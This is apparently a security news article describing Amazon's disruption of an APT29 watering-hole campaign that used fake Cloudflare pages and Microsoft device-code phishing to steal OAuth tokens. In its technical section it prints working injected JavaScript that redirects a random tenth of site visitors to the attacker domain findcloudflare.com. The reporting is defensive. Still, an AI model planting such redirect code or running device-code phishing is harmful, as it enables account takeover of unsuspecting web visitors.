Amazon Dismantles Russian APT29 Infrastructure Used to Attack Users


Cybersecurity: Amazon’s Disruption of APT29 Infrastructure

In late August 2025, Amazon's threat intelligence team identified a watering hole campaign run by APT29, a group linked to the Russian Foreign Intelligence Service (SVR). The operation compromised legitimate websites and planted code that redirected a share of their visitors to attacker-controlled infrastructure.

Once redirected, visitors landed on counterfeit Cloudflare verification pages. The pages were built to harvest credentials and to walk victims through Microsoft's device code authentication flow, so that the victim ended up approving a sign-in the attacker had started on a device the attacker controlled.

The injected code redirected only about 10 percent of site visitors, sending them to domains such as findcloudflare[.]com and cloudflare.redirectpartners[.]com. Because the pages imitated the familiar Cloudflare browser-check interstitial, many users had no reason to suspect them.

Amazon's analysts noted a change in APT29's tradecraft. Instead of targeting chosen individuals, the group opportunistically injected obfuscated JavaScript into compromised sites, widening the victim pool to anyone who happened to load a popular page. Visitors usually had no indication they had been rerouted until the fake page asked them to enter a device code or approve a new device; a victim who complied authorized a session that the attacker, not the victim, held.

The damage was not limited to credential theft. By abusing the device code flow, APT29 obtained OAuth tokens issued through the victim's own sign-in, multi-factor step included, and with those tokens it could operate inside corporate environments, move laterally, and gather intelligence long after the victim had closed the page. Although no AWS systems were compromised, the incident underscored the persistent threat posed by state-sponsored actors adapting their methods to evade traditional defenses.

Amazon worked with Cloudflare, Microsoft, and other providers to take down the malicious domains and isolated the EC2 instances the campaign was using, an illustration of what a coordinated industry response can achieve.

Technical Overview of Obfuscated JavaScript

The injected script used several evasion techniques. The payload was base64-encoded so that the malicious logic did not appear in plain text in the page source, and a randomization check redirected only a fraction of visitors, which lowered the chance that an analyst reloading the page would trigger it. Once decoded, the script set a cookie so that any given visitor was redirected at most once, then sent the browser to the fraudulent verification page with a client-side redirect. A simplified version of the decoded logic is provided below:

(function(){
    // A visitor who has already been redirected carries a marker cookie; leave them alone.
    if (document.cookie.indexOf('redir=') !== -1) { return; }
    // Only about one visitor in ten is redirected, so casual re-checks rarely reproduce it.
    if (Math.random() < 0.1) {
        var uid = Math.random().toString(36).substring(2);
        document.cookie = 'redir=' + uid + ';path=/';
        window.location.replace('https://findcloudflare.com/device/code?auth=' + uid);
    }
})();

This snippet shows the client-side stage of the campaign. When the original infrastructure was disrupted, APT29 moved from client-side to server-side redirects, which takes the redirect logic off the compromised page and out of reach of anyone inspecting its source, and registered fresh domains. By migrating quickly and refining its code, the group kept the campaign running through successive takedowns.

Amazon's disruption of this infrastructure highlights the need for continuous monitoring of web-based threats and for collaboration across the security community, since each takedown in this campaign was answered by new domains and a new hosting arrangement.
